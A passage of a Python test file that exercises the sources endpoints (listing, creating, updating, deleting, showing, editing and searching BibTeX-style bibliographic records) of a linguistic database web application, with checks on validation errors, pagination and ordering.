            s.type = u'misc'
        # Every second source gets an associated file.
        if i % 2 == 0:
            s.file_id = files[i - 1].id
        # Sources beyond the 8th look "old" for date-based search tests.
        if i > 8:
            s.datetime_modified = yesterday_timestamp
        Session.add(s)
    Session.commit()
def _create_test_data(n=100):
    """Populate the database with *n* File fixtures and *n* Source fixtures."""
    _create_test_models(n)
    _create_test_sources(n)
class TestSourcesController(TestController):
    # @nottest: this test is currently disabled from collection.
    @nottest
    def test_index(self):
        """Tests that GET /sources returns an array of all sources and that order_by and pagination parameters work correctly."""
        # Add 100 sources.
        def create_source_from_index(index):
            # Build one minimal 'book' source; only key/title vary by index.
            source = model.Source()
            source.type = u'book'
            source.key = u'key%d' % index
            source.author = u'<NAME>.'
            source.title = u'Syntactic Structures %d' % index
            source.publisher = u'Mouton'
            source.year = 1957
            return source
        sources = [create_source_from_index(i) for i in range(1, 101)]
        Session.add_all(sources)
        Session.commit()
        sources = h.get_sources(True)
        sources_count = len(sources)
        # Test that GET /sources gives us all of the sources.
        extra_environ = self.extra_environ_view
        response = self.app.get(url('sources'), headers=self.json_headers,
                                extra_environ=extra_environ)
        resp = json.loads(response.body)
        assert len(resp) == sources_count
        assert resp[0]['title'] == u'Syntactic Structures 1'
        assert resp[0]['id'] == sources[0].id
        assert response.content_type == 'application/json'
        # Test the paginator GET params.
        paginator = {'items_per_page': 23, 'page': 3}
        response = self.app.get(url('sources'), paginator, headers=self.json_headers,
                                extra_environ=extra_environ)
        resp = json.loads(response.body)
        assert len(resp['items']) == 23
        # Page 3 with 23 items/page starts at offset 46.
        assert resp['items'][0]['title'] == sources[46].title
        assert response.content_type == 'application/json'
        # Test the order_by GET params.
        order_by_params = {'order_by_model': 'Source', 'order_by_attribute': 'title',
                           'order_by_direction': 'desc'}
        response = self.app.get(url('sources'), order_by_params,
                                headers=self.json_headers, extra_environ=extra_environ)
        resp = json.loads(response.body)
        result_set = sorted([s.title for s in sources], reverse=True)
        assert result_set == [s['title'] for s in resp]
        assert response.content_type == 'application/json'
        # Test the order_by *with* paginator.
        params = {'order_by_model': 'Source', 'order_by_attribute': 'title',
                  'order_by_direction': 'desc', 'items_per_page': 23, 'page': 3}
        response = self.app.get(url('sources'), params,
                                headers=self.json_headers, extra_environ=extra_environ)
        resp = json.loads(response.body)
        assert result_set[46] == resp['items'][0]['title']
        # Expect a 400 error when the order_by_direction param is invalid
        order_by_params = {'order_by_model': 'Source', 'order_by_attribute': 'title',
                           'order_by_direction': 'descending'}
        response = self.app.get(url('sources'), order_by_params, status=400,
                                headers=self.json_headers, extra_environ=extra_environ)
        resp = json.loads(response.body)
        assert resp['errors']['order_by_direction'] == u"Value must be one of: asc; desc (not u'descending')"
        assert response.content_type == 'application/json'
        # Expect the default BY id ASCENDING ordering when the order_by_model/Attribute
        # param is invalid.
        order_by_params = {'order_by_model': 'Sourceful', 'order_by_attribute': 'titular',
                           'order_by_direction': 'desc'}
        response = self.app.get(url('sources'), order_by_params,
                                headers=self.json_headers, extra_environ=extra_environ)
        resp = json.loads(response.body)
        assert resp[0]['id'] == sources[0].id
        # Expect a 400 error when the paginator GET params are empty
        # or are integers less than 1
        paginator = {'items_per_page': u'a', 'page': u''}
        response = self.app.get(url('sources'), paginator, headers=self.json_headers,
                                extra_environ=extra_environ, status=400)
        resp = json.loads(response.body)
        assert resp['errors']['items_per_page'] == u'Please enter an integer value'
        assert resp['errors']['page'] == u'Please enter a value'
        assert response.content_type == 'application/json'
        paginator = {'items_per_page': 0, 'page': -1}
        response = self.app.get(url('sources'), paginator, headers=self.json_headers,
                                extra_environ=extra_environ, status=400)
        resp = json.loads(response.body)
        assert resp['errors']['items_per_page'] == u'Please enter a number that is 1 or greater'
        assert resp['errors']['page'] == u'Please enter a number that is 1 or greater'
        assert response.content_type == 'application/json'
@nottest
def test_create(self):
"""Tests that POST /sources creates a new source or returns an appropriate error
if the input is invalid.
"""
########################################################################
# BOOK
########################################################################
# Attempt to create a source that has an invalid BibTeX entry type and
# expect to fail. Also, check that the length restrictions on the other
# fields are working too.
params = self.source_create_params.copy()
params.update({
'type': u'novella',
'author': u'author' * 255
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin, status=400)
resp = json.loads(response.body)
assert resp['errors']['type'] == u'novella is not a valid BibTeX entry type'
assert resp['errors']['author'] == u'Enter a value not more than 255 characters long'
assert response.content_type == 'application/json'
# Create a book; required: author or editor, title, publisher and year
params = self.source_create_params.copy()
params.update({
'type': u'bOOk', # case is irrelevant for entry types
'key': u'chomsky57',
'author': u'<NAME>',
'title': u'Syntactic Structures',
'publisher': u'Mouton',
'year': 1957,
'edition': u'second', # good optional attribute for a book
'school': u'Stanford' # doesn't make sense for a book, but it will still be saved
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
sources_count = Session.query(Source).count()
assert resp['type'] == u'book' # the OLD converts type to lowercase
assert resp['school'] == u'Stanford'
assert resp['edition'] == u'second'
assert resp['booktitle'] == u''
assert resp['author'] == u'<NAME>'
assert response.content_type == 'application/json'
# Attempt to create another book with the same key and expect to fail.
params = self.source_create_params.copy()
params.update({
'type': u'bOOk',
'key': u'chomsky57', # This duplicate is the bad part.
'author': u'<NAME>',
'title': u'Structures Syntax-wise',
'publisher': u'Backwoods Publishing',
'year': 1984
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin, status=400)
resp = json.loads(response.body)
new_sources_count = Session.query(Source).count()
assert sources_count == new_sources_count
assert resp['errors']['key'] == u'The submitted source key is not unique'
assert response.content_type == 'application/json'
# Attempt to create another book with an invalid key and expect to fail.
params = self.source_create_params.copy()
params.update({
'type': u'bOOk',
'key': u'cho\u0301msky57', # Unicode characters are not permitted, PERHAPS THEY SHOULD BE? ...
'author': u'<NAME>',
'title': u'Structures Syntax-wise',
'publisher': u'Backwoods Publishing',
'year': 1984
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin, status=400)
resp = json.loads(response.body)
new_sources_count = Session.query(Source).count()
assert sources_count == new_sources_count
assert resp['errors']['key'] == u'Source keys can only contain letters, numerals and symbols (except the comma)'
# Attempt to create a book source that is invalid because it lacks a year.
params = self.source_create_params.copy()
params.update({
'type': u'book',
'key': u'chomsky57a',
'author': u'<NAME>',
'title': u'Syntactic Structures',
'publisher': u'Mouton',
'edition': u'second' # good optional attribute for a book
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin, status=400)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert resp['errors'] == \
u'Sources of type book require values for title, publisher and year as well as a value for at least one of author and editor.'
assert sources_count == new_sources_count
assert response.content_type == 'application/json'
# Attempt to create a book source that is invalid because it lacks both
# author and editor
params = self.source_create_params.copy()
params.update({
'type': u'book',
'key': u'chomsky57a',
'title': u'Syntactic Structures',
'publisher': u'Mouton',
'year': 1957
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin, status=400)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert resp['errors'] == \
u'Sources of type book require values for title, publisher and year as well as a value for at least one of author and editor.'
assert sources_count == new_sources_count
assert response.content_type == 'application/json'
########################################################################
# ARTICLE
########################################################################
# Create an article; required: author, title, journal, year
params = self.source_create_params.copy()
params.update({
'type': u'Article', # case is irrelevant for entry types
'key': u'bloomfield46',
'author': u'<NAME>.',
'title': u'Algonquian',
'year': 1946,
'journal': u'Linguistic Structures of Native America',
'pages': u'85--129'
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert resp['type'] == u'article' # the OLD converts type to lowercase
assert resp['title'] == u'Algonquian'
assert resp['author'] == u'<NAME>.'
assert resp['journal'] == u'Linguistic Structures of Native America'
assert resp['pages'] == u'85--129'
assert resp['year'] == 1946
assert new_sources_count == sources_count + 1
assert response.content_type == 'application/json'
# Attempt to create an article without a year and expect to fail
params = self.source_create_params.copy()
params.update({
'type': u'Article', # case is irrelevant for entry types
'key': u'bloomfieldL46',
'author': u'<NAME>.',
'title': u'Algonquian',
'journal': u'Linguistic Structures of Native America',
'pages': u'85--129'
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin, status=400)
resp = json.loads(response.body)
sources_count = Session.query(Source).count()
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert sources_count == new_sources_count
assert resp['errors'] == \
u'Sources of type article require values for author, title, journal and year.'
assert response.content_type == 'application/json'
########################################################################
# BOOKLET
########################################################################
# Create a booklet; required: title
params = self.source_create_params.copy()
params.update({
'type': u'BOOKLET', # case is irrelevant for entry types
'key': u'mypoetry',
'title': u'My Poetry (unpublished)'
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert resp['type'] == u'booklet' # the OLD converts type to lowercase
assert resp['title'] == u'My Poetry (unpublished)'
assert new_sources_count == sources_count + 1
assert response.content_type == 'application/json'
# Attempt to create a booklet without a title and expect to fail
params = self.source_create_params.copy()
params.update({
'type': u'Booklet', # case is irrelevant for entry types
'key': u'mypoetry2',
'author': '<NAME>'
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin, status=400)
resp = json.loads(response.body)
sources_count = Session.query(Source).count()
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert sources_count == new_sources_count
assert resp['errors'] == \
u'Sources of type booklet require a value for title.'
assert response.content_type == 'application/json'
########################################################################
# INBOOK
########################################################################
# Create an inbook; required: title, publisher, year and one of author
# or editor and one of chapter or pages.
params = self.source_create_params.copy()
params.update({
'type': u'inbook', # case is irrelevant for entry types
'key': u'vendler67',
'title': u'Linguistics in Philosophy',
'publisher': u'Cornell University Press',
'year': 1967,
'author': '<NAME>',
'chapter': u'4'
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
inbook_id = resp['id']
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert resp['type'] == u'inbook' # the OLD converts type to lowercase
assert resp['title'] == u'Linguistics in Philosophy'
assert resp['publisher'] == u'Cornell University Press'
assert resp['year'] == 1967
assert resp['author'] == u'<NAME>'
assert resp['chapter'] == u'4'
assert resp['pages'] == u''
assert new_sources_count == sources_count + 1
assert response.content_type == 'application/json'
# Attempt to create an inbook without a chapter or pages and expect to fail
params = self.source_create_params.copy()
params.update({
'type': u'inbook', # case is irrelevant for entry types
'key': u'vendler67again',
'title': u'Linguistics in Philosophy',
'publisher': u'Cornell University Press',
'year': 1967,
'author': '<NAME>'
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin, status=400)
resp = json.loads(response.body)
sources_count = Session.query(Source).count()
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert sources_count == new_sources_count
assert resp['errors'] == \
u'Sources of type inbook require values for title, publisher and year as well as a value for at least one of author and editor and at least one of chapter and pages.'
assert response.content_type == 'application/json'
# 'required': (('author', 'editor'), 'title', ('chapter', 'pages'), 'publisher', 'year')
# Create a book that the inbook above will cross-reference once updated.
# required: author or editor, title, publisher and year
params = self.source_create_params.copy()
params.update({
'type': u'bOOk', # case is irrelevant for entry types
'key': u'vendler67book',
'author': u'<NAME>',
'title': u'Linguistics in Philosophy',
'publisher': u'Cornell University Press',
'year': 1967
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert resp['type'] == u'book' # the OLD converts type to lowercase
assert resp['title'] == u'Linguistics in Philosophy'
assert resp['author'] == u'<NAME>'
assert resp['year'] == 1967
assert resp['publisher'] == u'Cornell University Press'
assert resp['key'] == u'vendler67book'
assert response.content_type == 'application/json'
# Now update the valid inbook created above and have it cross-reference
# the book just created above. Because the Vendler book has all of the
# rest of the attributes, all we need to specify is the chapter.
params = self.source_create_params.copy()
params.update({
'type': u'inbook', # case is irrelevant for entry types
'key': u'vendler67',
'chapter': u'4',
'crossref': u'vendler67book'
})
params = json.dumps(params)
response = self.app.put(url('source', id=inbook_id), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
assert resp['type'] == u'inbook' # the OLD converts type to lowercase
assert resp['crossref_source']['title'] == u'Linguistics in Philosophy'
assert resp['crossref_source']['publisher'] == u'Cornell University Press'
assert resp['crossref_source']['year'] == 1967
assert resp['crossref_source']['author'] == u'<NAME>'
assert resp['chapter'] == u'4'
# Now update our inbook back to how it was and remove the cross-reference;
# make sure that the crossref_source value is now None.
params = self.source_create_params.copy()
params.update({
'type': u'inbook', # case is irrelevant for entry types
'key': u'vendler67',
'title': u'Linguistics in Philosophy',
'publisher': u'Cornell University Press',
'year': 1967,
'author': '<NAME>',
'chapter': u'4'
})
params = json.dumps(params)
response = self.app.put(url('source', id=inbook_id), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert resp['type'] == u'inbook' # the OLD converts type to lowercase
assert resp['title'] == u'Linguistics in Philosophy'
assert resp['publisher'] == u'Cornell University Press'
assert resp['year'] == 1967
assert resp['author'] == u'<NAME>'
assert resp['chapter'] == u'4'
assert resp['pages'] == u''
assert resp['crossref'] == u''
assert resp['crossref_source'] == None
assert new_sources_count == sources_count
assert response.content_type == 'application/json'
########################################################################
# MISC
########################################################################
# Create a misc; required: nothing.
params = self.source_create_params.copy()
params.update({
'type': u'misc', # case is irrelevant for entry types
'key': u'manuel83',
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert resp['type'] == u'misc' # the OLD converts type to lowercase
assert new_sources_count == sources_count + 1
assert response.content_type == 'application/json'
########################################################################
# INPROCEEDINGS
########################################################################
# Create an inproceedings; required: author, title, booktitle, year.
params = self.source_create_params.copy()
params.update({
'type': u'inpROceedings', # case is irrelevant for entry types
'key': u'oaho83',
'title': u'On Notions of Information Transfer in {VLSI} Circuits',
'booktitle': u'Proc. Fifteenth Annual ACM',
'year': 1983,
'author': u'<NAME> and <NAME> and <NAME>'
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
inproceedings_id = resp['id']
assert resp['type'] == u'inproceedings' # the OLD converts type to lowercase
assert resp['title'] == u'On Notions of Information Transfer in {VLSI} Circuits'
assert resp['booktitle'] == u'Proc. Fifteenth Annual ACM'
assert resp['year'] == 1983
assert resp['author'] == u'<NAME> and <NAME> and <NAME>'
assert new_sources_count == sources_count + 1
assert response.content_type == 'application/json'
# Attempt to create an inproceedings that lacks booktitle and year
# values; expect to fail.
params = self.source_create_params.copy()
params.update({
'type': u'inpROceedings', # case is irrelevant for entry types
'key': u'<KEY>',
'title': u'On Notions of Information Transfer in {VLSI} Circuits',
'author': '<NAME> and <NAME> and <NAME>'
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin, status=400)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert new_sources_count == sources_count
assert response.content_type == 'application/json'
assert resp['errors'] == u'Sources of type inproceedings require values for author, title, booktitle and year.'
# Now create a proceedings source that will be cross-referenced by the
# above inproceedings source.
params = self.source_create_params.copy()
params.update({
'type': u'PROceedings', # case is irrelevant for entry types
'key': u'<KEY>',
'title': u'Proc. Fifteenth Annual',
'booktitle': u'Proc. Fifteenth Annual ACM',
'year': 1983
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
proceedings_id = resp['id']
assert resp['type'] == u'proceedings' # the OLD converts type to lowercase
assert resp['title'] == u'Proc. Fifteenth Annual'
assert resp['booktitle'] == u'Proc. Fifteenth Annual ACM'
assert resp['year'] == 1983
assert new_sources_count == sources_count + 1
assert response.content_type == 'application/json'
# Now attempt to create an inproceedings that lacks booktitle and year
# values but cross-reference the proceedings source we just created; expect to succeed.
params = self.source_create_params.copy()
params.update({
'type': u'inpROceedings', # case is irrelevant for entry types
'key': u'<KEY>',
'title': u'On Notions of Information Transfer in {VLSI} Circuits',
'author': u'<NAME> and <NAME> and <NAME>',
'crossref': u'acm15_83'
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert new_sources_count == sources_count + 1
assert response.content_type == 'application/json'
assert resp['type'] == u'inproceedings' # the OLD converts type to lowercase
assert resp['title'] == u'On Notions of Information Transfer in {VLSI} Circuits'
assert resp['crossref_source']['booktitle'] == u'Proc. Fifteenth Annual ACM'
assert resp['crossref_source']['year'] == 1983
assert resp['author'] == u'<NAME> and <NAME> and <NAME>'
assert new_sources_count == sources_count + 1
assert response.content_type == 'application/json'
assert resp['crossref_source']['id'] == proceedings_id
# Make sure the crossref stuff works with updates
params = self.source_create_params.copy()
params.update({
'type': u'inpROceedings', # case is irrelevant for entry types
'key': u'oaho83',
'title': u'On Notions of Information Transfer in {VLSI} Circuits',
'author': u'<NAME> and <NAME> and <NAME>',
'crossref': u'acm15_83'
})
params = json.dumps(params)
response = self.app.put(url('source', id=inproceedings_id), params,
self.json_headers, self.extra_environ_admin)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert response.content_type == 'application/json'
assert resp['type'] == u'inproceedings' # the OLD converts type to lowercase
assert resp['title'] == u'On Notions of Information Transfer in {VLSI} Circuits'
assert resp['crossref_source']['booktitle'] == u'Proc. Fifteenth Annual ACM'
assert resp['crossref_source']['year'] == 1983
assert resp['author'] == u'<NAME> and <NAME> and <NAME>'
assert new_sources_count == sources_count
assert response.content_type == 'application/json'
assert resp['crossref_source']['id'] == proceedings_id
@nottest
def test_new(self):
    """GET /sources/new should return the sorted list of valid BibTeX entry types."""
    # Request the "new source" metadata as a contributor (any authenticated
    # role may view it).
    new_response = self.app.get(
        url('new_source'),
        headers=self.json_headers,
        extra_environ=self.extra_environ_contrib)
    payload = json.loads(new_response.body)
    assert payload['types'] == sorted(entry_types.keys())
    assert new_response.content_type == 'application/json'
@nottest
def test_update(self):
    """Tests that PUT /sources/1 updates an existing source.

    Covers three cases: a genuine update (row count unchanged,
    datetime_modified changes), an update with identical data (400 error,
    datetime_modified unchanged), and an update that associates a file.
    """
    # Create a book to update.
    params = self.source_create_params.copy()
    params.update({
        'type': u'book',
        'key': u'chomsky57',
        'author': u'<NAME>',
        'title': u'Syntactic Structures',
        'publisher': u'Mouton',
        'year': 1957
    })
    params = json.dumps(params)
    response = self.app.post(url('sources'), params, self.json_headers,
        self.extra_environ_admin)
    resp = json.loads(response.body)
    source_count = Session.query(Source).count()
    book_id = resp['id']
    original_datetime_modified = resp['datetime_modified']
    # Update the book
    sleep(1) # sleep for a second to ensure that MySQL registers a different datetime_modified for the update
    params = self.source_create_params.copy()
    params.update({
        'type': u'book',
        'key': u'chomsky57',
        'author': u'<NAME>.', # Change the format of the author
        'title': u'Syntactic Structures',
        'publisher': u'Mouton',
        'year': 1957
    })
    params = json.dumps(params)
    response = self.app.put(url('source', id=book_id), params, self.json_headers,
        self.extra_environ_admin)
    resp = json.loads(response.body)
    datetime_modified = resp['datetime_modified']
    new_source_count = Session.query(Source).count()
    # A successful update modifies the existing row in place; no new row.
    assert source_count == new_source_count
    assert datetime_modified != original_datetime_modified
    assert response.content_type == 'application/json'
    # Attempt an update with no new input and expect to fail
    sleep(1) # sleep for a second to ensure that MySQL could register a different datetime_modified for the update
    params = self.source_create_params.copy()
    params.update({
        'type': u'book',
        'key': u'chomsky57',
        'author': u'<NAME>.',
        'title': u'Syntactic Structures',
        'publisher': u'Mouton',
        'year': 1957
    })
    params = json.dumps(params)
    response = self.app.put(url('source', id=book_id), params, self.json_headers,
        self.extra_environ_admin, status=400)
    resp = json.loads(response.body)
    source_count = new_source_count
    new_source_count = Session.query(Source).count()
    our_book_datetime_modified = Session.query(Source).get(book_id).datetime_modified
    # The failed (no-op) update must leave the row's timestamp untouched.
    assert our_book_datetime_modified.isoformat() == datetime_modified
    assert source_count == new_source_count
    assert resp['error'] == u'The update request failed because the submitted data were not new.'
    assert response.content_type == 'application/json'
    # Update by adding a file to the source
    file_ = h.generate_default_file()
    Session.add(file_)
    Session.commit()
    file_id = file_.id
    filename = file_.name
    sleep(1) # sleep for a second to ensure that MySQL can register a different datetime_modified for the update
    params = self.source_create_params.copy()
    params.update({
        'type': u'book',
        'key': u'chomsky57',
        'author': u'<NAME>.',
        'title': u'Syntactic Structures',
        'publisher': u'Mouton',
        'year': 1957,
        'file': file_id
    })
    params = json.dumps(params)
    response = self.app.put(url('source', id=book_id), params, self.json_headers,
        self.extra_environ_admin)
    resp = json.loads(response.body)
    source_count = new_source_count
    new_source_count = Session.query(Source).count()
    new_datetime_modified = resp['datetime_modified']
    # Adding a file counts as new data, so the update succeeds and the
    # returned source carries the associated file.
    assert new_datetime_modified != datetime_modified
    assert source_count == new_source_count
    assert resp['file']['name'] == filename
    assert response.content_type == 'application/json'
@nottest
def test_delete(self):
    """Tests that DELETE /sources/id deletes the source with id=id.

    Also verifies the 404 responses for an unknown id and a missing id.
    """
    # Create a book to delete.
    params = self.source_create_params.copy()
    params.update({
        'type': u'book',
        'key': u'chomsky57',
        'author': u'<NAME>',
        'title': u'Syntactic Structures',
        'publisher': u'Mouton',
        'year': 1957
    })
    params = json.dumps(params)
    response = self.app.post(url('sources'), params, self.json_headers,
        self.extra_environ_admin)
    resp = json.loads(response.body)
    source_count = Session.query(Source).count()
    book_id = resp['id']
    # Now delete the source
    response = self.app.delete(url('source', id=book_id), headers=self.json_headers,
        extra_environ=self.extra_environ_admin)
    resp = json.loads(response.body)
    new_source_count = Session.query(Source).count()
    # The delete removes the row and echoes the deleted source back.
    assert new_source_count == source_count - 1
    assert resp['id'] == book_id
    assert response.content_type == 'application/json'
    # Trying to get the deleted source from the db should return None
    deleted_source = Session.query(Source).get(book_id)
    assert deleted_source == None
    # Delete with an invalid id
    id = 9999999999999
    response = self.app.delete(url('source', id=id),
        headers=self.json_headers, extra_environ=self.extra_environ_admin,
        status=404)
    assert u'There is no source with id %s' % id in json.loads(response.body)['error']
    assert response.content_type == 'application/json'
    # Delete without an id
    response = self.app.delete(url('source', id=''), status=404,
        headers=self.json_headers, extra_environ=self.extra_environ_admin)
    assert json.loads(response.body)['error'] == 'The resource could not be found.'
    assert response.content_type == 'application/json'
@nottest
def test_show(self):
    """Tests that GET /source/id returns the source with id=id or an appropriate error.

    Exercises an invalid id (404), a missing id (404) and a valid id (200).
    """
    # Create a book to show.
    params = self.source_create_params.copy()
    params.update({
        'type': u'book',
        'key': u'chomsky57',
        'author': u'<NAME>',
        'title': u'Syntactic Structures',
        'publisher': u'Mouton',
        'year': 1957
    })
    params = json.dumps(params)
    response = self.app.post(url('sources'), params, self.json_headers,
        self.extra_environ_admin)
    resp = json.loads(response.body)
    book_id = resp['id']
    # Try to get a source using an invalid id
    id = 100000000000
    response = self.app.get(url('source', id=id),
        headers=self.json_headers, extra_environ=self.extra_environ_admin,
        status=404)
    resp = json.loads(response.body)
    assert u'There is no source with id %s' % id in json.loads(response.body)['error']
    assert response.content_type == 'application/json'
    # No id
    response = self.app.get(url('source', id=''), status=404,
        headers=self.json_headers, extra_environ=self.extra_environ_admin)
    assert json.loads(response.body)['error'] == 'The resource could not be found.'
    assert response.content_type == 'application/json'
    # Valid id
    response = self.app.get(url('source', id=book_id), headers=self.json_headers,
        extra_environ=self.extra_environ_admin)
    resp = json.loads(response.body)
    # The returned object mirrors what was POSTed above.
    assert resp['author'] == u'<NAME>'
    assert resp['year'] == 1957
    assert response.content_type == 'application/json'
@nottest
def test_edit(self):
    """Tests that GET /sources/id/edit returns a JSON object of data necessary to edit the source with id=id.
    The JSON object is of the form {'source': {...}, 'data': {...}} or
    {'error': '...'} (with a 404 status code) depending on whether the id is
    valid or invalid/unspecified, respectively.
    """
    # Create a book to request edit on.
    params = self.source_create_params.copy()
    params.update({
        'type': u'book',
        'key': u'chomsky57',
        'author': u'<NAME>',
        'title': u'Syntactic Structures',
        'publisher': u'Mouton',
        'year': 1957
    })
    params = json.dumps(params)
    response = self.app.post(url('sources'), params, self.json_headers,
        self.extra_environ_admin)
    resp = json.loads(response.body)
    book_id = resp['id']
    # Not logged in: expect 401 Unauthorized
    response = self.app.get(url('edit_source', id=book_id), status=401)
    resp = json.loads(response.body)
    assert resp['error'] == u'Authentication is required to access this resource.'
    assert response.content_type == 'application/json'
    # Invalid id
    id = 9876544
    response = self.app.get(url('edit_source', id=id),
        headers=self.json_headers, extra_environ=self.extra_environ_admin,
        status=404)
    assert u'There is no source with id %s' % id in json.loads(response.body)['error']
    assert response.content_type == 'application/json'
    # No id
    response = self.app.get(url('edit_source', id=''), status=404,
        headers=self.json_headers, extra_environ=self.extra_environ_admin)
    assert json.loads(response.body)['error'] == \
        'The resource could not be found.'
    # Valid id
    response = self.app.get(url('edit_source', id=book_id),
        headers=self.json_headers, extra_environ=self.extra_environ_admin)
    resp = json.loads(response.body)
    # 'source' holds the record being edited; 'data' holds form metadata
    # (the valid entry types) needed to render an edit form.
    assert resp['source']['title'] == u'Syntactic Structures'
    assert resp['data']['types'] == sorted(entry_types.keys())
    assert response.content_type == 'application/json'
@nottest
def test_search(self):
    """Tests that SEARCH /sources (a.k.a. POST /sources/search) correctly returns an array of sources based on search criteria.

    Covers NULL-valued filters, LIKE/regex filters, boolean combinations,
    pagination (valid, invalid and silently-ignored paginators, and a
    client-supplied count), and order_by handling (asc/desc defaults and
    malformed expressions).
    """
    # Create some sources (and other models) to search and add SEARCH to the list of allowable methods
    _create_test_data(100)
    self._add_SEARCH_to_web_test_valid_methods()
    # Round-trip the fixtures through JSON so comparisons below use the
    # same serialized representation the server returns.
    sources = json.loads(json.dumps(h.get_sources(True), cls=h.JSONOLDEncoder))
    # Searching where values may be NULL
    json_query = json.dumps({'query': {'filter': ['Source', 'publisher', '=', None]}})
    response = self.app.post(url('/sources/search'), json_query,
        self.json_headers, self.extra_environ_admin)
    resp = json.loads(response.body)
    result_set = [s for s in sources if not s['publisher']]
    assert resp
    assert len(resp) == len(result_set)
    assert set([s['id'] for s in resp]) == set([s['id'] for s in result_set])
    assert response.content_type == 'application/json'
    json_query = json.dumps({'query': {'filter': ['Source', 'publisher', 'like', u'%P%']}})
    response = self.app.post(url('/sources/search'), json_query,
        self.json_headers, self.extra_environ_admin)
    resp = json.loads(response.body)
    result_set = [s for s in sources if s['publisher'] and u'P' in s['publisher']]
    assert resp
    assert len(resp) == len(result_set)
    assert set([s['id'] for s in resp]) == set([s['id'] for s in result_set])
    assert response.content_type == 'application/json'
    # A fairly complex search
    json_query = json.dumps({'query': {'filter': [
        'and', [
            ['Source', 'type', 'in', [u'book', u'article']],
            ['not', ['Source', 'key', 'regex', u'[537]']],
            ['or', [
                ['Source', 'author', 'like', u'%A%'],
                ['Source', 'year', '>', 1994]]]]]}})
    response = self.app.post(url('/sources/search'), json_query,
        self.json_headers, self.extra_environ_admin)
    resp = json.loads(response.body)
    # Mirror the server-side filter in Python to build the expected set.
    result_set = [s for s in sources if
        s['type'] in ['book', 'article'] and
        not re.search('[537]', s['key']) and
        ('A' in s['author'] or s['year'] > 1994)]
    assert resp
    assert len(resp) == len(result_set)
    assert set([s['id'] for s in resp]) == set([s['id'] for s in result_set])
    assert response.content_type == 'application/json'
    # A basic search with a paginator provided.
    json_query = json.dumps({'query': {
        'filter': ['Source', 'title', 'like', '%3%']},
        'paginator': {'page': 2, 'items_per_page': 5}})
    response = self.app.request(url('sources'), method='SEARCH', body=json_query,
        headers=self.json_headers, environ=self.extra_environ_admin)
    resp = json.loads(response.body)
    result_set = [s for s in sources if s['title'] and '3' in s['title']]
    # Page 2 with 5 items per page covers result_set indices 5..9.
    assert resp['paginator']['count'] == len(result_set)
    assert len(resp['items']) == 5
    assert resp['items'][0]['id'] == result_set[5]['id']
    assert resp['items'][-1]['id'] == result_set[9]['id']
    assert response.content_type == 'application/json'
    # An invalid paginator (here 'page' is less than 1) will result in formencode.Invalid
    # being raised resulting in a response with a 400 status code and a JSON error msg.
    json_query = json.dumps({
        'query': {
            'filter': ['Source', 'title', 'like', '%3%']},
        'paginator': {'page': 0, 'items_per_page': 10}})
    response = self.app.request(url('sources'), method='SEARCH', body=json_query,
        headers=self.json_headers, environ=self.extra_environ_admin, status=400)
    resp = json.loads(response.body)
    assert resp['errors']['page'] == u'Please enter a number that is 1 or greater'
    assert response.content_type == 'application/json'
    # Some "invalid" paginators will silently fail. For example, if there is
    # no 'pages' key, then SEARCH /sources will just assume there is no paginator
    # and all of the results will be returned.
    json_query = json.dumps({
        'query': {
            'filter': ['Source', 'title', 'like', '%3%']},
        'paginator': {'pages': 1, 'items_per_page': 10}})
    response = self.app.request(url('sources'), method='SEARCH', body=json_query,
        headers=self.json_headers, environ=self.extra_environ_admin)
    resp = json.loads(response.body)
    assert len(resp) == len([s for s in sources if s['title'] and '3' in s['title']])
